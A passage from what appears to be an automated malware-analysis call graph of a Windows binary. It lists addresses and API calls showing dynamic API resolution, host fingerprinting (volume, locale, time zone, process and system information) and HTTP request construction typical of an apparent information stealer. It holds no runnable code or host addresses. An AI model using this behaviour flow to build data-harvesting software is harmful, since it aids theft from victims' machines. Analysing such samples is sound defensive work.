14402->14403 14404 a53d75 14403->14404 14405 a545c0 2 API calls 14404->14405 14406 a53d8e 14405->14406 14407 a545c0 2 API calls 14406->14407 14408 a53da7 14407->14408 14409 a545c0 2 API calls 14408->14409 14410 a53dc0 14409->14410 14411 a545c0 2 API calls 14410->14411 14412 a53dd9 14411->14412 14413 a545c0 2 API calls 14412->14413 14414 a53df2 14413->14414 14415 a545c0 2 API calls 14414->14415 14416 a53e0b 14415->14416 14417 a545c0 2 API calls 14416->14417 14418 a53e24 14417->14418 14419 a545c0 2 API calls 14418->14419 14420 a53e3d 14419->14420 14421 a545c0 2 API calls 14420->14421 14422 a53e56 14421->14422 14423 a545c0 2 API calls 14422->14423 14424 a53e6f 14423->14424 14425 a545c0 2 API calls 14424->14425 14426 a53e88 14425->14426 14427 a545c0 2 API calls 14426->14427 14428 a53ea1 14427->14428 14429 a545c0 2 API calls 14428->14429 14430 a53eba 14429->14430 14431 a545c0 2 API calls 14430->14431 14432 a53ed3 14431->14432 14433 a545c0 2 API calls 14432->14433 14434 a53eec 14433->14434 14435 a545c0 2 API calls 14434->14435 14436 a53f05 14435->14436 14437 a545c0 2 API calls 14436->14437 14438 a53f1e 14437->14438 14439 a545c0 2 API calls 14438->14439 14440 a53f37 14439->14440 14441 a545c0 2 API calls 14440->14441 14442 a53f50 14441->14442 14443 a545c0 2 API calls 14442->14443 14444 a53f69 14443->14444 14445 a545c0 2 API calls 14444->14445 14446 a53f82 14445->14446 14447 a545c0 2 API calls 14446->14447 14448 a53f9b 14447->14448 14449 a545c0 2 API calls 14448->14449 14450 a53fb4 14449->14450 14451 a545c0 2 API calls 14450->14451 14452 a53fcd 14451->14452 14453 a545c0 2 API calls 14452->14453 14454 a53fe6 14453->14454 14455 a545c0 2 API calls 14454->14455 14456 a53fff 14455->14456 14457 a545c0 2 API calls 14456->14457 14458 a54018 14457->14458 14459 a545c0 2 API calls 14458->14459 14460 a54031 14459->14460 14461 a545c0 2 API calls 14460->14461 14462 a5404a 14461->14462 14463 a545c0 2 API calls 14462->14463 14464 a54063 14463->14464 14465 a545c0 2 API calls 14464->14465 14466 a5407c 14465->14466 14467 a545c0 2 API calls 14466->14467 14468 a54095 14467->14468 14469 a545c0 2 API calls 14468->14469 14470 a540ae 14469->14470 14471 a545c0 2 API calls 14470->14471 14472 a540c7 14471->14472 14473 a545c0 2 API calls 14472->14473 14474 a540e0 14473->14474 14475 a545c0 2 API calls 14474->14475 14476 a540f9 14475->14476 14477 a545c0 2 API calls 14476->14477 14478 a54112 14477->14478 14479 a545c0 2 API calls 14478->14479 14480 a5412b 14479->14480 14481 a545c0 2 API calls 14480->14481 14482 a54144 14481->14482 14483 a545c0 2 API calls 14482->14483 14484 a5415d 14483->14484 14485 a545c0 2 API calls 14484->14485 14486 a54176 14485->14486 14487 a545c0 2 API calls 14486->14487 14488 a5418f 14487->14488 14489 a545c0 2 API calls 14488->14489 14490 a541a8 14489->14490 14491 a545c0 2 API calls 14490->14491 14492 a541c1 14491->14492 14493 a545c0 2 API calls 14492->14493 14494 a541da 14493->14494 14495 a545c0 2 API calls 14494->14495 14496 a541f3 14495->14496 14497 a545c0 2 API calls 14496->14497 14498 a5420c 14497->14498 14499 a545c0 2 API calls 14498->14499 14500 a54225 14499->14500 14501 a545c0 2 API calls 14500->14501 14502 a5423e 14501->14502 14503 a545c0 2 API calls 14502->14503 14504 a54257 14503->14504 14505 a545c0 2 API calls 14504->14505 14506 a54270 14505->14506 14507 a545c0 2 API calls 14506->14507 14508 a54289 14507->14508 14509 a545c0 2 API calls 14508->14509 14510 a542a2 14509->14510 14511 a545c0 2 API calls 14510->14511 14512 a542bb 14511->14512 14513 a545c0 2 API calls 14512->14513 14514 a542d4 14513->14514 14515 a545c0 2 API calls 14514->14515 14516 a542ed 14515->14516 14517 a545c0 2 API calls 14516->14517 14518 a54306 14517->14518 14519 a545c0 2 API calls 14518->14519 14520 a5431f 14519->14520 14521 a545c0 2 API calls 14520->14521 14522 a54338 14521->14522 14523 a545c0 2 API calls 14522->14523 14524 a54351 14523->14524 14525 a545c0 2 API calls 14524->14525 14526 a5436a 14525->14526 14527 a545c0 2 API calls 14526->14527 14528 a54383 14527->14528 14529 a545c0 2 API calls 14528->14529 14530 a5439c 14529->14530 14531 a545c0 2 API calls 14530->14531 14532 a543b5 14531->14532 14533 a545c0 2 API calls 14532->14533 14534 a543ce 14533->14534 14535 a545c0 2 API calls 14534->14535 14536 a543e7 14535->14536 14537 a545c0 2 API calls 14536->14537 14538 a54400 14537->14538 14539 a545c0 2 API calls 14538->14539 14540 a54419 14539->14540 14541 a545c0 2 API calls 14540->14541 14542 a54432 14541->14542 14543 a545c0 2 API calls 14542->14543 14544 a5444b 14543->14544 14545 a545c0 2 API calls 14544->14545 14546 a54464 14545->14546 14547 a545c0 2 API calls 14546->14547 14548 a5447d 14547->14548 14549 a545c0 2 API calls 14548->14549 14550 a54496 14549->14550 14551 a545c0 2 API calls 14550->14551 14552 a544af 14551->14552 14553 a545c0 2 API calls 14552->14553 14554 a544c8 14553->14554 14555 a545c0 2 API calls 14554->14555 14556 a544e1 14555->14556 14557 a545c0 2 API calls 14556->14557 14558 a544fa 14557->14558 14559 a545c0 2 API calls 14558->14559 14560 a54513 14559->14560 14561 a545c0 2 API calls 14560->14561 14562 a5452c 14561->14562 14563 a545c0 2 API calls 14562->14563 14564 a54545 14563->14564 14565 a545c0 2 API calls 14564->14565 14566 a5455e 14565->14566 14567 a545c0 2 API calls 14566->14567 14568 a54577 14567->14568 14569 a545c0 2 API calls 14568->14569 14570 a54590 14569->14570 14571 a545c0 2 API calls 14570->14571 14572 a545a9 14571->14572 14573 a69c10 14572->14573 14574 a6a036 8 API calls 14573->14574 14575 a69c20 43 API calls 14573->14575 14576 a6a146 14574->14576 14577 a6a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14574->14577 14575->14574 14578 a6a216 14576->14578 14579 a6a153 8 API calls 14576->14579 14577->14576 14580 a6a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14578->14580 14581 a6a298 14578->14581 14579->14578 14580->14581 14582 a6a337 14581->14582 14583 a6a2a5 6 API calls 14581->14583 14584 a6a344 9 API calls 14582->14584 14585 a6a41f 14582->14585 14583->14582 14584->14585 14586 a6a4a2 14585->14586 14587 a6a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14585->14587 14588 a6a4dc 14586->14588 14589 a6a4ab GetProcAddress GetProcAddress 14586->14589 14587->14586 14590 a6a515 14588->14590 14591 a6a4e5 GetProcAddress GetProcAddress 14588->14591 14589->14588 14592 a6a612 14590->14592 14593 a6a522 10 API calls 14590->14593 14591->14590 14594 a6a67d 14592->14594 14595 a6a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14592->14595 14593->14592 14596 a6a686 GetProcAddress 14594->14596 14597 a6a69e 14594->14597 14595->14594 14596->14597 14598 a6a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14597->14598 14599 a65ca3 14597->14599 14598->14599 14600 a51590 14599->14600 15719 a51670 14600->15719 14603 a6a7a0 lstrcpy 14604 a515b5 14603->14604 14605 a6a7a0 lstrcpy 14604->14605 14606 a515c7 14605->14606 14607 a6a7a0 lstrcpy 14606->14607 14608 a515d9 14607->14608 14609 a6a7a0 lstrcpy 14608->14609 14610 a51663 14609->14610 14611 a65510 14610->14611 14612 a65521 14611->14612 14613 a6a820 2 API calls 14612->14613 14614 a6552e 14613->14614 14615 a6a820 2 API calls 14614->14615 14616 a6553b 14615->14616 14617 a6a820 2 API calls 14616->14617 14618 a65548 14617->14618 14619 a6a740 lstrcpy 14618->14619 14620 a65555 14619->14620 14621 a6a740 lstrcpy 14620->14621 14622 a65562 14621->14622 14623 a6a740 lstrcpy 14622->14623 14624 a6556f 14623->14624 14625 a6a740 lstrcpy 14624->14625 14638 a6557c 14625->14638 14626 a6a820 lstrlen lstrcpy 14626->14638 14627 a65643 StrCmpCA 14627->14638 14628 a656a0 StrCmpCA 14630 a657dc 14628->14630 14628->14638 14629 a6a7a0 lstrcpy 14629->14638 14631 a6a8a0 lstrcpy 14630->14631 14632 a657e8 14631->14632 14633 a6a820 2 API calls 14632->14633 14636 a657f6 14633->14636 14634 a6a740 lstrcpy 14634->14638 14635 a651f0 20 API calls 14635->14638 14639 a6a820 2 API calls 14636->14639 14637 a65856 StrCmpCA 14637->14638 14640 a65991 14637->14640 14638->14626 14638->14627 14638->14628 14638->14629 14638->14634 14638->14635 14638->14637 14641 a6a8a0 lstrcpy 14638->14641 14647 a652c0 25 API calls 14638->14647 14649 a65a0b StrCmpCA 14638->14649 14661 a6578a StrCmpCA 14638->14661 14663 a51590 lstrcpy 14638->14663 14664 a6593f StrCmpCA 14638->14664 14643 a65805 14639->14643 14642 a6a8a0 lstrcpy 14640->14642 14641->14638 14644 a6599d 14642->14644 14645 a51670 lstrcpy 14643->14645 14646 a6a820 2 API calls 14644->14646 14665 a65811 14645->14665 14648 a659ab 14646->14648 14647->14638 14652 a6a820 2 API calls 14648->14652 14650 a65a16 Sleep 14649->14650 14651 a65a28 14649->14651 14650->14638 14653 a6a8a0 lstrcpy 14651->14653 14654 a659ba 14652->14654 14655 a65a34 14653->14655 14656 a51670 lstrcpy 14654->14656 14657 a6a820 2 API calls 14655->14657 14656->14665 14658 a65a43 14657->14658 14659 a6a820 2 API calls 14658->14659 14660 a65a52 14659->14660 14662 a51670 lstrcpy 14660->14662 14661->14638 14662->14665 14663->14638 14664->14638 14665->13718 14667 a67553 GetVolumeInformationA 14666->14667 14668 a6754c 14666->14668 14669 a67591 14667->14669 14668->14667 14670 a675fc GetProcessHeap RtlAllocateHeap 14669->14670 14671 a67628 wsprintfA 14670->14671 14672 a67619 14670->14672 14674 a6a740 lstrcpy 14671->14674 14673 a6a740 lstrcpy 14672->14673 14675 a65da7 14673->14675 14674->14675 14675->13739 14677 a6a7a0 lstrcpy 14676->14677 14678 a54899 14677->14678 15728 a547b0 14678->15728 14680 a548a5 14681 a6a740 lstrcpy 14680->14681 14682 a548d7 14681->14682 14683 a6a740 lstrcpy 14682->14683 14684 a548e4 14683->14684 14685 a6a740 lstrcpy 14684->14685 14686 a548f1 14685->14686 14687 a6a740 lstrcpy 14686->14687 14688 a548fe 14687->14688 14689 a6a740 lstrcpy 14688->14689 14690 a5490b InternetOpenA StrCmpCA 14689->14690 14691 a54944 14690->14691 14692 a54ecb InternetCloseHandle 14691->14692 15734 a68b60 14691->15734 14694 a54ee8 14692->14694 15749 a59ac0 CryptStringToBinaryA 14694->15749 14695 a54963 15742 a6a920 14695->15742 14698 a54976 14700 a6a8a0 lstrcpy 14698->14700 14706 a5497f 14700->14706 14701 a6a820 2 API calls 14702 a54f05 14701->14702 14703 a6a9b0 4 API calls 14702->14703 14704 a54f1b 14703->14704 14707 a6a8a0 lstrcpy 14704->14707 14705 a54f27 ctype 14708 a6a7a0 lstrcpy 14705->14708 14709 a6a9b0 4 API calls 14706->14709 14707->14705 14721 a54f57 14708->14721 14710 a549a9 14709->14710 14711 a6a8a0 lstrcpy 14710->14711 14712 a549b2 14711->14712 14713 a6a9b0 4 API calls 14712->14713 14714 a549d1 14713->14714 14715 a6a8a0 lstrcpy 14714->14715 14716 a549da 14715->14716 14717 a6a920 3 API calls 14716->14717 14718 a549f8 14717->14718 14719 a6a8a0 lstrcpy 14718->14719 14720 a54a01 14719->14720 14722 a6a9b0 4 API calls 14720->14722 14721->13742 14723 a54a20 14722->14723 14724 a6a8a0 lstrcpy 14723->14724 14725 a54a29 14724->14725 14726 a6a9b0 4 API calls 14725->14726 14727 a54a48 14726->14727 14728 a6a8a0 lstrcpy 14727->14728 14729 a54a51 14728->14729 14730 a6a9b0 4 API calls 14729->14730 14731 a54a7d 14730->14731 14732 a6a920 3 API calls 14731->14732 14733 a54a84 14732->14733 14734 a6a8a0 lstrcpy 14733->14734 14735 a54a8d 14734->14735 14736 a54aa3 InternetConnectA 14735->14736 14736->14692 14737 a54ad3 HttpOpenRequestA 14736->14737 14739 a54ebe InternetCloseHandle 14737->14739 14740 a54b28 14737->14740 14739->14692 14741 a6a9b0 4 API calls 14740->14741 14742 a54b3c 14741->14742 14743 a6a8a0 lstrcpy 14742->14743 14744 a54b45 14743->14744 14745 a6a920 3 API calls 14744->14745 14746 a54b63 14745->14746 14747 a6a8a0 lstrcpy 14746->14747 14748 a54b6c 14747->14748 14749 a6a9b0 4 API calls 14748->14749 14750 a54b8b 14749->14750 14751 a6a8a0 lstrcpy 14750->14751 14752 a54b94 14751->14752 14753 a6a9b0 4 API calls 14752->14753 14754 a54bb5 14753->14754 14755 a6a8a0 lstrcpy 14754->14755 14756 a54bbe 14755->14756 14757 a6a9b0 4 API calls 14756->14757 14758 a54bde 14757->14758 14759 a6a8a0 lstrcpy 14758->14759 14760 a54be7 14759->14760 14761 a6a9b0 4 API calls 14760->14761 14762 a54c06 14761->14762 14763 a6a8a0 lstrcpy 14762->14763 14764 a54c0f 14763->14764 14765 a6a920 3 API calls 14764->14765 14766 a54c2d 14765->14766 14767 a6a8a0 lstrcpy 14766->14767 14768 a54c36 14767->14768 14769 a6a9b0 4 API calls 14768->14769 14770 a54c55 14769->14770 14771 a6a8a0 lstrcpy 14770->14771 14772 a54c5e 14771->14772 14773 a6a9b0 4 API calls 14772->14773 14774 a54c7d 14773->14774 14775 a6a8a0 lstrcpy 14774->14775 14776 a54c86 14775->14776 14777 a6a920 3 API calls 14776->14777 14778 a54ca4 14777->14778 14779 a6a8a0 lstrcpy 14778->14779 14780 a54cad 14779->14780 14781 a6a9b0 4 API calls 14780->14781 14782 a54ccc 14781->14782 14783 a6a8a0 lstrcpy 14782->14783 14784 a54cd5 14783->14784 14785 a6a9b0 4 API calls 14784->14785 14786 a54cf6 14785->14786 14787 a6a8a0 lstrcpy 14786->14787 14788 a54cff 14787->14788 14789 a6a9b0 4 API calls 14788->14789 14790 a54d1f 14789->14790 14791 a6a8a0 lstrcpy 14790->14791 14792 a54d28 14791->14792 14793 a6a9b0 4 API calls 14792->14793 14794 a54d47 14793->14794 14795 a6a8a0 lstrcpy 14794->14795 14796 a54d50 14795->14796 14797 a6a920 3 API calls 14796->14797 14798 a54d6e 14797->14798 14799 a6a8a0 lstrcpy 14798->14799 14800 a54d77 14799->14800 14801 a6a740 lstrcpy 14800->14801 14802 a54d92 14801->14802 14803 a6a920 3 API calls 14802->14803 14804 a54db3 14803->14804 14805 a6a920 3 API calls 14804->14805 14806 a54dba 14805->14806 14807 a6a8a0 lstrcpy 14806->14807 14808 a54dc6 14807->14808 14809 a54de7 lstrlen 14808->14809 14810 a54dfa 14809->14810 14811 a54e03 lstrlen 14810->14811 15748 a6aad0 14811->15748 14813 a54e13 HttpSendRequestA 14814 a54e32 InternetReadFile 14813->14814 14815 a54e67 InternetCloseHandle 14814->14815 14820 a54e5e 14814->14820 14818 a6a800 14815->14818 14817 a6a9b0 4 API calls 14817->14820 14818->14739 14819 a6a8a0 lstrcpy 14819->14820 14820->14814 14820->14815 14820->14817 14820->14819 15755 a6aad0 14821->15755 14823 a617c4 StrCmpCA 14824 a617cf ExitProcess 14823->14824 14825 a617d7 14823->14825 14826 a619c2 14825->14826 14827 a618cf StrCmpCA 14825->14827 14828 a618ad StrCmpCA 14825->14828 14829 a61932 StrCmpCA 14825->14829 14830 a61913 StrCmpCA 14825->14830 14831 a61970 StrCmpCA 14825->14831 14832 a618f1 StrCmpCA 14825->14832 14833 a61951 StrCmpCA 14825->14833 14834 a6187f StrCmpCA 14825->14834 14835 a6185d StrCmpCA 14825->14835 14836 a6a820 lstrlen lstrcpy 14825->14836 14826->13744 14827->14825 14828->14825 14829->14825 14830->14825 14831->14825 14832->14825 14833->14825 14834->14825 14835->14825 14836->14825 14838 a6a7a0 lstrcpy 14837->14838 14839 a55979 14838->14839 14840 a547b0 2 API calls 14839->14840 14841 a55985 14840->14841 14842 a6a740 lstrcpy 14841->14842 14843 a559ba 14842->14843 14844 a6a740 lstrcpy 14843->14844 14845 a559c7 14844->14845 14846 a6a740 lstrcpy 14845->14846 14847 a559d4 14846->14847 14848 a6a740 lstrcpy 14847->14848 14849 a559e1 14848->14849 14850 a6a740 lstrcpy 14849->14850 14851 a559ee InternetOpenA StrCmpCA 14850->14851 14852 a55a1d 14851->14852 14853 a55fc3 InternetCloseHandle 14852->14853 14855 a68b60 3 API calls 14852->14855 14854 a55fe0 14853->14854 14857 a59ac0 4 API calls 14854->14857 14856 a55a3c 14855->14856 14858 a6a920 3 API calls 14856->14858 14859 a55fe6 14857->14859 14860 a55a4f 14858->14860 14862 a6a820 2 API calls 14859->14862 14865 a5601f ctype 14859->14865 14861 a6a8a0 lstrcpy 14860->14861 14866 a55a58 14861->14866 14863 a55ffd 14862->14863 14864 a6a9b0 4 API calls 14863->14864 14867 a56013 14864->14867 14868 a6a7a0 lstrcpy 14865->14868 14870 a6a9b0 4 API calls 14866->14870 14869 a6a8a0 lstrcpy 14867->14869 14880 a5604f 14868->14880 14869->14865 14871 a55a82 14870->14871 14872 a6a8a0 lstrcpy 14871->14872 14873 a55a8b 14872->14873 14874 a6a9b0 4 API calls 14873->14874 14875 a55aaa 14874->14875 14876 a6a8a0 lstrcpy 14875->14876 14877 a55ab3 14876->14877 14878 a6a920 3 API calls 14877->14878 14879 a55ad1 14878->14879 14881 a6a8a0 lstrcpy 14879->14881 14880->13750 14882 a55ada 14881->14882 14883 a6a9b0 4 API calls 14882->14883 14884 a55af9 14883->14884 14885 a6a8a0 lstrcpy 14884->14885 14886 a55b02 14885->14886 14887 a6a9b0 4 API calls 14886->14887 14888 a55b21 14887->14888 14889 a6a8a0 lstrcpy 14888->14889 14890 a55b2a 14889->14890 14891 a6a9b0 4 API calls 14890->14891 14892 a55b56 14891->14892 14893 a6a920 3 API calls 14892->14893 14894 a55b5d 14893->14894 14895 a6a8a0 lstrcpy 14894->14895 14896 a55b66 14895->14896 14897 a55b7c InternetConnectA 14896->14897 14897->14853 14898 a55bac HttpOpenRequestA 14897->14898 14900 a55fb6 InternetCloseHandle 14898->14900 14901 a55c0b 14898->14901 14900->14853 14902 a6a9b0 4 API calls 14901->14902 14903 a55c1f 14902->14903 14904 a6a8a0 lstrcpy 14903->14904 14905 a55c28 14904->14905 14906 a6a920 3 API calls 14905->14906 14907 a55c46 14906->14907 14908 a6a8a0 lstrcpy 14907->14908 14909 a55c4f 14908->14909 14910 a6a9b0 4 API calls 14909->14910 14911 a55c6e 14910->14911 14912 a6a8a0 lstrcpy 14911->14912 14913 a55c77 14912->14913 14914 a6a9b0 4 API calls 14913->14914 14915 a55c98 14914->14915 14916 a6a8a0 lstrcpy 14915->14916 14917 a55ca1 14916->14917 14918 a6a9b0 4 API calls 14917->14918 14919 a55cc1 14918->14919 14920 a6a8a0 lstrcpy 14919->14920 14921 a55cca 14920->14921 14922 a6a9b0 4 API calls 14921->14922 14923 a55ce9 14922->14923 14924 a6a8a0 lstrcpy 14923->14924 14925 a55cf2 14924->14925 14926 a6a920 3 API calls 14925->14926 14927 a55d10 14926->14927 14928 a6a8a0 lstrcpy 14927->14928 14929 a55d19 14928->14929 14930 a6a9b0 4 API calls 14929->14930 14931 a55d38 14930->14931 14932 a6a8a0 lstrcpy 14931->14932 14933 a55d41 14932->14933 14934 a6a9b0 4 API calls 14933->14934 14935 a55d60 14934->14935 14936 a6a8a0 lstrcpy 14935->14936 14937 a55d69 14936->14937 14938 a6a920 3 API calls 14937->14938 14939 a55d87 14938->14939 14940 a6a8a0 lstrcpy 14939->14940 14941 a55d90 14940->14941 14942 a6a9b0 4 API calls 14941->14942 14943 a55daf 14942->14943 14944 a6a8a0 lstrcpy 14943->14944 14945 a55db8 14944->14945 14946 a6a9b0 4 API calls 14945->14946 14947 a55dd9 14946->14947 14948 a6a8a0 lstrcpy 14947->14948 14949 a55de2 14948->14949 14950 a6a9b0 4 API calls 14949->14950 14951 a55e02 14950->14951 14952 a6a8a0 lstrcpy 14951->14952 14953 a55e0b 14952->14953 14954 a6a9b0 4 API calls 14953->14954 14955 a55e2a 14954->14955 14956 a6a8a0 lstrcpy 14955->14956 14957 a55e33 14956->14957 14958 a6a920 3 API calls 14957->14958 14959 a55e54 14958->14959 14960 a6a8a0 lstrcpy 14959->14960 14961 a55e5d 14960->14961 14962 a55e70 lstrlen 14961->14962 15756 a6aad0 14962->15756 14964 a55e81 lstrlen GetProcessHeap RtlAllocateHeap 15757 a6aad0 14964->15757 14966 a55eae lstrlen 14967 a55ebe 14966->14967 14968 a55ed7 lstrlen 14967->14968 14969 a55ee7 14968->14969 14970 a55ef0 lstrlen 14969->14970 14971 a55f03 14970->14971 14972 a55f1a lstrlen 14971->14972 15758 a6aad0 14972->15758 14974 a55f2a HttpSendRequestA 14975 a55f35 InternetReadFile 14974->14975 14976 a55f6a InternetCloseHandle 14975->14976 14980 a55f61 14975->14980 14976->14900 14978 a6a9b0 4 API calls 14978->14980 14979 a6a8a0 lstrcpy 14979->14980 14980->14975 14980->14976 14980->14978 14980->14979 14983 a61077 14981->14983 14982 a61151 14982->13752 14983->14982 14984 a6a820 lstrlen lstrcpy 14983->14984 14984->14983 14990 a60db7 14985->14990 14986 a60f17 14986->13760 14987 a60e27 StrCmpCA 14987->14990 14988 a60e67 StrCmpCA 14988->14990 14989 a60ea4 StrCmpCA 14989->14990 14990->14986 14990->14987 14990->14988 14990->14989 14991 a6a820 lstrlen lstrcpy 14990->14991 14991->14990 14995 a60f67 14992->14995 14993 a61044 14993->13768 14994 a60fb2 StrCmpCA 14994->14995 14995->14993 14995->14994 14996 a6a820 lstrlen lstrcpy 14995->14996 14996->14995 14998 a6a740 lstrcpy 14997->14998 14999 a61a26 14998->14999 15000 a6a9b0 4 API calls 14999->15000 15001 a61a37 15000->15001 15002 a6a8a0 lstrcpy 15001->15002 15003 a61a40 15002->15003 15004 a6a9b0 4 API calls 15003->15004 15005 a61a5b 15004->15005 15006 a6a8a0 lstrcpy 15005->15006 15007 a61a64 15006->15007 15008 a6a9b0 4 API calls 15007->15008 15009 a61a7d 15008->15009 15010 a6a8a0 lstrcpy 15009->15010 15011 a61a86 15010->15011 15012 a6a9b0 4 API calls 15011->15012 15013 a61aa1 15012->15013 15014 a6a8a0 lstrcpy 15013->15014 15015 a61aaa 15014->15015 15016 a6a9b0 4 API calls 15015->15016 15017 a61ac3 15016->15017 15018 a6a8a0 lstrcpy 15017->15018 15019 a61acc 15018->15019 15020 a6a9b0 4 API calls 15019->15020 15021 a61ae7 15020->15021 15022 a6a8a0 lstrcpy 15021->15022 15023 a61af0 15022->15023 15024 a6a9b0 4 API calls 15023->15024 15025 a61b09 15024->15025 15026 a6a8a0 lstrcpy 15025->15026 15027 a61b12 15026->15027 15028 a6a9b0 4 API calls 15027->15028 15029 a61b2d 15028->15029 15030 a6a8a0 lstrcpy 15029->15030 15031 a61b36 15030->15031 15032 a6a9b0 4 API calls 15031->15032 15033 a61b4f 15032->15033 15034 a6a8a0 lstrcpy 15033->15034 15035 a61b58 15034->15035 15036 a6a9b0 4 API calls 15035->15036 15037 a61b76 15036->15037 15038 a6a8a0 lstrcpy 15037->15038 15039 a61b7f 15038->15039 15040 a67500 6 API calls 15039->15040 15041 a61b96 15040->15041 15042 a6a920 3 API calls 15041->15042 15043 a61ba9 15042->15043 15044 a6a8a0 lstrcpy 15043->15044 15045 a61bb2 15044->15045 15046 a6a9b0 4 API calls 15045->15046 15047 a61bdc 15046->15047 15048 a6a8a0 lstrcpy 15047->15048 15049 a61be5 15048->15049 15050 a6a9b0 4 API calls 15049->15050 15051 a61c05 15050->15051 15052 a6a8a0 lstrcpy 15051->15052 15053 a61c0e 15052->15053 15759 a67690 GetProcessHeap RtlAllocateHeap 15053->15759 15056 a6a9b0 4 API calls 15057 a61c2e 15056->15057 15058 a6a8a0 lstrcpy 15057->15058 15059 a61c37 15058->15059 15060 a6a9b0 4 API calls 15059->15060 15061 a61c56 15060->15061 15062 a6a8a0 lstrcpy 15061->15062 15063 a61c5f 15062->15063 15064 a6a9b0 4 API calls 15063->15064 15065 a61c80 15064->15065 15066 a6a8a0 lstrcpy 15065->15066 15067 a61c89 15066->15067 15766 a677c0 GetCurrentProcess IsWow64Process 15067->15766 15070 a6a9b0 4 API calls 15071 a61ca9 15070->15071 15072 a6a8a0 lstrcpy 15071->15072 15073 a61cb2 15072->15073 15074 a6a9b0 4 API calls 15073->15074 15075 a61cd1 15074->15075 15076 a6a8a0 lstrcpy 15075->15076 15077 a61cda 15076->15077 15078 a6a9b0 4 API calls 15077->15078 15079 a61cfb 15078->15079 15080 a6a8a0 lstrcpy 15079->15080 15081 a61d04 15080->15081 15082 a67850 3 API calls 15081->15082 15083 a61d14 15082->15083 15084 a6a9b0 4 API calls 15083->15084 15085 a61d24 15084->15085 15086 a6a8a0 lstrcpy 15085->15086 15087 a61d2d 15086->15087 15088 a6a9b0 4 API calls 15087->15088 15089 a61d4c 15088->15089 15090 a6a8a0 lstrcpy 15089->15090 15091 a61d55 15090->15091 15092 a6a9b0 4 API calls 15091->15092 15093 a61d75 15092->15093 15094 a6a8a0 lstrcpy 15093->15094 15095 a61d7e 15094->15095 15096 a678e0 3 API calls 15095->15096 15097 a61d8e 15096->15097 15098 a6a9b0 4 API calls 15097->15098 15099 a61d9e 15098->15099 15100 a6a8a0 lstrcpy 15099->15100 15101 a61da7 15100->15101 15102 a6a9b0 4 API calls 15101->15102 15103 a61dc6 15102->15103 15104 a6a8a0 lstrcpy 15103->15104 15105 a61dcf 15104->15105 15106 a6a9b0 4 API calls 15105->15106 15107 a61df0 15106->15107 15108 a6a8a0 lstrcpy 15107->15108 15109 a61df9 15108->15109 15768 a67980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15109->15768 15112 a6a9b0 4 API calls 15113 a61e19 15112->15113 15114 a6a8a0 lstrcpy 15113->15114 15115 a61e22 15114->15115 15116 a6a9b0 4 API calls 15115->15116 15117 a61e41 15116->15117 15118 a6a8a0 lstrcpy 15117->15118 15119 a61e4a 15118->15119 15120 a6a9b0 4 API calls 15119->15120 15121 a61e6b 15120->15121 15122 a6a8a0 lstrcpy 15121->15122 15123 a61e74 15122->15123 15770 a67a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15123->15770 15126 a6a9b0 4 API calls 15127 a61e94 15126->15127 15128 a6a8a0 lstrcpy 15127->15128 15129 a61e9d 15128->15129 15130 a6a9b0 4 API calls 15129->15130 15131 a61ebc 15130->15131 15132 a6a8a0 lstrcpy 15131->15132 15133 a61ec5 15132->15133 15134 a6a9b0 4 API calls 15133->15134 15135 a61ee5 15134->15135 15136 a6a8a0 lstrcpy 15135->15136 15137 a61eee 15136->15137 15773 a67b00 GetUserDefaultLocaleName 15137->15773 15140 a6a9b0 4 API calls 15141 a61f0e 15140->15141 15142 a6a8a0 lstrcpy 15141->15142 15143 a61f17 15142->15143 15144 a6a9b0 4 API calls 15143->15144 15145 a61f36 15144->15145 15146 a6a8a0 lstrcpy 15145->15146 15147 a61f3f 15146->15147 15148 a6a9b0 4 API calls 15147->15148 15149 a61f60 15148->15149 15150 a6a8a0 lstrcpy 15149->15150 15151 a61f69 15150->15151 15777 a67b90 15151->15777 15153 a61f80 15154 a6a920 3 API calls 15153->15154 15155 a61f93 15154->15155 15156 a6a8a0 lstrcpy 15155->15156 15157 a61f9c 15156->15157 15158 a6a9b0 4 API calls 15157->15158 15159 a61fc6 15158->15159 15160 a6a8a0 lstrcpy 15159->15160 15161 a61fcf 15160->15161 15162 a6a9b0 4 API calls 15161->15162 15163 a61fef 15162->15163 15164 a6a8a0 lstrcpy 15163->15164 15165 a61ff8 15164->15165 15789 a67d80 GetSystemPowerStatus 15165->15789 15168 a6a9b0 4 API calls 15169 a62018 15168->15169 15170 a6a8a0 lstrcpy 15169->15170 15171 a62021 15170->15171 15172 a6a9b0 4 API calls 15171->15172 15173 a62040 15172->15173 15174 a6a8a0 lstrcpy 15173->15174 15175 a62049 15174->15175 15176 a6a9b0 4 API calls 15175->15176 15177 a6206a 15176->15177 15178 a6a8a0 lstrcpy 15177->15178 15179 a62073 15178->15179 15180 a6207e GetCurrentProcessId 15179->15180 15791 a69470 OpenProcess 15180->15791 15183 a6a920 3 API calls 15184 a620a4 15183->15184 15185 a6a8a0 lstrcpy 15184->15185 15186 a620ad 15185->15186 15187 a6a9b0 4 API calls 15186->15187 15188 a620d7 15187->15188 15189 a6a8a0 lstrcpy 15188->15189 15190 a620e0 15189->15190 15191 a6a9b0 4 API calls 15190->15191 15192 a62100 15191->15192 15193 a6a8a0 lstrcpy 15192->15193 15194 a62109 15193->15194 15796 a67e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15194->15796 15197 a6a9b0 4 API calls 15198 a62129 15197->15198 15199 a6a8a0 lstrcpy 15198->15199 15200 a62132 15199->15200 15201 a6a9b0 4 API calls 15200->15201 15202 a62151 15201->15202 15203 a6a8a0 lstrcpy 15202->15203 15204 a6215a 15203->15204 15205 a6a9b0 4 API calls 15204->15205 15206 a6217b 15205->15206 15207 a6a8a0 lstrcpy 15206->15207 15208 a62184 15207->15208 15800 a67f60 15208->15800 15211 a6a9b0 4 API calls 15212 a621a4 15211->15212 15213 a6a8a0 lstrcpy 15212->15213 15214 a621ad 15213->15214 15215 a6a9b0 4 API calls 15214->15215 15216 a621cc 15215->15216 15217 a6a8a0 lstrcpy 15216->15217 15218 a621d5 15217->15218 15219 a6a9b0 4 API calls 15218->15219 15220 a621f6 15219->15220 15221 a6a8a0 lstrcpy 15220->15221 15222 a621ff 15221->15222 15813 a67ed0 GetSystemInfo wsprintfA 15222->15813 15225 a6a9b0 